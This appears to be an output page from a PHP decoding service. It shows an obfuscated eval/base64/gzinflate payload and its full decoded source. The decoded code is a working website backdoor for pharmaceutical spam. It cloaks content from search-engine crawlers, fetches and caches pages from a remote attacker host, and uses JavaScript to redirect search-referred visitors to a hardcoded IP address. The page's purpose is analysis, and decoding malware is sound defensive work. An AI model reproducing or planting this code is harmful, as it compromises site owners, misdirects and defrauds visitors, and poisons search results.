Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval(gzinflate(base64_decode('pRlrc9u48bM70/+AaBhTjGmJol5WbNpJHeXuZppLqjid6diOBiJBiR..

Decoded Output download

if (!defined('frmDs')){
	define('frmDs' ,1);
	error_reporting(0);
	
	function frm_dl ($url) {
		if (function_exists('curl_init')) {
			$ch = curl_init($url);
			curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
			$out = curl_exec ($ch);
			if (curl_errno($ch) !== 0) $out = false;
			curl_close ($ch);
		} else {$out = @file_get_contents($url);}
		return trim($out);
	}
	
	function frm_crpt($in){
		$il=strlen($in);$o='';
		for ($i = 0; $i < $il; $i++) $o.=$in[$i] ^ '*';
		return $o;
	}
	
	function frm_getcache($tmpdir,$link,$cmtime,$toe=false){
		$f = $tmpdir.'/sess_'.md5(preg_replace('/^http:\/\/[^\/]+/', '', $link));
		$fe = file_exists($f);
		if(!$fe || time() - filemtime($f) > 60 * $cmtime)
		{
			$dlc=frm_dl($link);
			if($fe && $dlc===false) 
				@touch($f);
			else
			{
				if($fe && empty($dlc) && $toe) 
				{
					@touch($f);
				}
				else
				{
					if($fp = @fopen($f,'w')){fwrite($fp, frm_crpt($dlc)); fclose($fp);}
					else{return $dlc;}
				}
			}
		}
		$fc = @file_get_contents($f);
		return ($fc)?frm_crpt($fc):'';
	}
	
	function frm_isbot(){
		$ua=@strtolower($_SERVER['HTTP_USER_AGENT']);
		if(($lip=ip2long($_SERVER['REMOTE_ADDR']))<0)$lip+=4294967296; 
		$rs = array(array(3639549953,3639558142),array(1089052673,1089060862),array(1123635201,1123639294),array(1208926209,1208942590),
					array(3512041473,3512074238),array(1113980929,1113985022),array(1249705985,1249771518),array(1074921473,1074925566),
					array(3481178113,3481182206),array(2915172353,2915237886),array(3627728897,3627737086),array(1823541249,1823543294));
		foreach ($rs as $r) if($lip>=$r[0] && $lip<=$r[1]) return true;
		if(!$ua)return true;
		$bots = array('googlebot','bingbot','slurp','msnbot','jeeves','teoma','crawler','spider');
		foreach ($bots as $b) if(strpos($ua, $b)!==false) return true;
		$h=@gethostbyaddr($_SERVER['REMOTE_ADDR']);
		$hba=array('google','msn','yahoo');
		if($h) foreach ($hba as $hb) if(strpos($h, $hb)!==false) return true;
		return false;
	}
	
	function frm_tmpdir(){
		$fs = array('/tmp','/var/tmp','./wp-content/cache','./wp-content/uploads','./tmp','./cache','./images');
        foreach (array('TMP', 'TEMP', 'TMPDIR') as $v) {
            if ($t = getenv($v)) {$fs[]=$t;}
        }
        if (function_exists('sys_get_temp_dir')) {$fs[]=sys_get_temp_dir();}
        $fs[]='.';
        
        foreach ($fs as $f){
        	$tf = $f.'/'.md5(rand());
        	if($fp = @fopen($tf, 'w')){
        		fclose($fp);
        		unlink($tf);
        		return $f;
        	}
        }
		return false;
	}

	function frm_seref(){
		$r = @strtolower($_SERVER["HTTP_REFERER"]);
		$ses = array('google','bing','yahoo','ask','aol');
		foreach ($ses as $se) if(strpos($r, $se.'.')!=false) return true;
		return false;
	}
	
	function frm_havekey($s=false){
		$nks = explode('|','abilify|albenza|aldactone|amoxil|antabuse|apcalis|atarax|baclofen|bactrim|bimatoprost|buspar|celebrex|celexa|cialis|cipro|clomid|desyrel|diflucan|doxycycline|elavil|erectalis|eriacta|erythromycin|finpecia|flagyl|glucophage|inderal|kamagra|lasix|levaquin|levitra|lexapro|megalis|mobic|motilium|nexium|nolvadex|orlistat|paxil|penisole|periactin|premarin|priligy|propecia|proscar|proventil|retin-a|robaxin|seroquel|silagra|sildalis|silvitra|strattera|stromectol|p-force|synthroid|tadacip|tadalis|tadapox|tenormin|tetracycline|topamax|valtrex|ventolin|viagra|vigora|wellbutrin|zanaflex|zenegra|zithromax|sildenafil|tadalafil|vardenafil|zovirax');
		$k = ($s==false)?@strtolower($_SERVER["HTTP_REFERER"].$_SERVER["REQUEST_URI"]):$s;
		if (strpos($k,"site%3A")!==false||strpos($k,"inurl%3A")!==false) return '';
		foreach ($nks as $n)if(preg_match("/(|_)$n(|_)/" , $k)) return $n;
		return '';
	}
	
	function frm_strtonum($Str, $Check, $Magic) {
		$Int32Unit = 4294967296;
		$length = strlen($Str);
		for ($i = 0; $i < $length; $i++) {
			$Check *= $Magic;
			if ($Check >= $Int32Unit) {
				$Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
				$Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
			}
			$Check += ord($Str{$i});
		}
		return $Check;
	}

	function frm_chhash($String) {
		$Check1 =frm_strtonum($String, 0x1505, 0x21);
		$Check2 = frm_strtonum($String, 0, 0x1003F);
		$Check1 >>= 2;
		$Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
		$Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
		$Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);
		$T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
		$T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );
		$Hashnum = ($T1 | $T2);
		$CheckByte = 0;
		$Flag = 0;
		$HashStr = sprintf('%u', $Hashnum) ;
		$length = strlen($HashStr);
		for ($i = $length - 1;  $i >= 0;  $i --) {
			$Re = $HashStr{$i};
			if (1 === ($Flag % 2)) {
				$Re += $Re;
				$Re = (int)($Re / 10) + ($Re % 10);
			}
			$CheckByte += $Re;
			$Flag ++;
		}
		$CheckByte %= 10;
		if (0 !== $CheckByte) {
			$CheckByte = 10 - $CheckByte;
			if (1 === ($Flag % 2) ) {
				if (1 === ($CheckByte % 2)) {
					$CheckByte += 9;
				}
				$CheckByte >>= 1;
			}
		}
		return '7'.$CheckByte.$HashStr;
	}
	
	function frm_chpr($url,$td){
		$ch=frm_chhash($url);
		$res=frm_getcache($td,"http://toolbarqueries.google.com/tbr?client=navclient-auto&features=Rank&ch=$ch&q=info:$url",60*24*7);
		if(($pos = strpos($res, "Rank_"))!==false) return substr($res,9,1);
	}
	
	function frm_red($k){
		if(!frm_isbot() && frm_seref()){
			$r=@urlencode($_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
			$s=@urlencode($_SERVER['HTTP_REFERER']);
			die("<!DOCTYPE html><html><body><script>document.location=(\"http://178.73.212.30/stat/go.php?k=$k&s=$s&r=$r\");</script></body></html>");
		}
	}
	
	$tdir = frm_tmpdir();
	$isb=frm_isbot();
	$k=frm_havekey();
	$host = preg_replace('/^w{3}\./','', strtolower($_SERVER['HTTP_HOST']));
	if($cv=@$_POST[md5($host.'ch')]){exit($cv);}
	if($tdir && strlen($host)<100 && !preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/', $host)){
		$parg = substr(preg_replace( '/[^a-z]+/', '',strtolower(base64_encode(md5($host.'p1')))),0,3);
		$sp = "http://hguekbcmmb.rr.nu/stat/feed.php?pa=$parg&h=$host";
		//
		$tp=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
		if($isb && ($ppr = frm_chpr($tp)) > 1){
			$pc=frm_getcache($tdir, $sp."&a=l&p=".urlencode($tp)."&pr=$ppr",60*24);
			if($pc) die($pc);
		}
		//
		$ruri = strtolower($_SERVER['REQUEST_URI']);
		$pageid = (isset($_GET[$parg]))?$_GET[$parg]*1:0;
		if((strpos($ruri,'/?')===0||strpos($ruri,'/index.php?')===0) && $pageid > 0){
			frm_red($k);
			die(frm_getcache($tdir, $sp."&p=$pageid",60*24,true));
		}	
		if (($ruri=='/' || $ruri=='/index.php') && $isb) {
			$c=frm_getcache($tdir, $sp ,60*24);
			if($c)die($c);
		}
		//
		if($k && $sdl = frm_getcache($tdir, $sp."&a=s", ($isb ? 30 : 60*24*7) ,true)){
			if(strpos($sdl, '|'.$ruri.'|') !== false){
				frm_red($k);
				die(frm_getcache($tdir, $sp."&a=s&p=".urlencode($ruri),60*24*7,true));
			}
		}
	}
	if($k) frm_red($k);
}

Did this file decode correctly?

Original Code

<?php eval(gzinflate(base64_decode('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')));?>

Function Calls

gzinflate 1
base64_decode 1

Variables

None

Stats

MD5 d59009f2b9e3098f5979a0da06fa68e3
Eval Count 1
Decode Time 100 ms